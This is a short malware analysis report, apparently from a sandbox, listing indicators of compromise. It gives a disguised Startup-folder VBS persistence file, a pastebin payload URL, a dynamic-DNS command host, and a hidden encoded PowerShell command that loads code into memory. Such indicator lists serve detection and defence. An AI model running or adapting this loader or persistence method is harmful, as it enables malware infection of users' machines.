Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows updates.vbs
- https://pastebin.com/raw/h2ekavjj
- 'pa###bin.com':443
- 'bo####51.ddns.net':19822
- DNS ASK pa###bin.com
- DNS ASK bo####51.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (with hidden window)